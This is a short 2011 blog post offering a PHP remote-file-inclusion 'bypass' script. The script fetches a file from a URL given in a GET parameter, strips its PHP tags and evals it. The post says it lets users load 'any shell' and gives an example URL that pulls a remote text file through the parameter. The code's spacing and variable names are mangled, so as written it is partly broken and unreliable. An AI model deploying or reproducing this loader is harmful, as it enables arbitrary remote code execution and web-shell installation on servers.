menu

Monday, 20 June 2011

Bypass RFI php 5.2.X.X


<? Php
/ *
 ************************
 * Include any File php *
 * PHP (Bypass 5.2 .*) *
 ************************
 * Coded By AL-MoGrM *
 * T0v@hotmail.Com *
 ************************
* /
if ( $ _GET [ T0v ]) {
$ File = Implode ( "\ n" , file ( $ _GET [ T0v ]));
$ T0v = str_replace ( "<? php" , "" , $ file );
$ T0v = str_replace ( "<?" , "" , $ T0v );
$ T0v = str_replace ( "?>" , "" , $ T0v );
eval ( $ T0v );
}
?>

This will bypass the filter of  php type..So now you can upload any shell *.php
a gap in php that allows you to withdraw any php file from outside the server because the versions of the new proof drag
CODE mine site and drag this manner in a shell
http://site.com/file.php?t0v=http://...mages/Ex/r.txt

No comments:

Post a Comment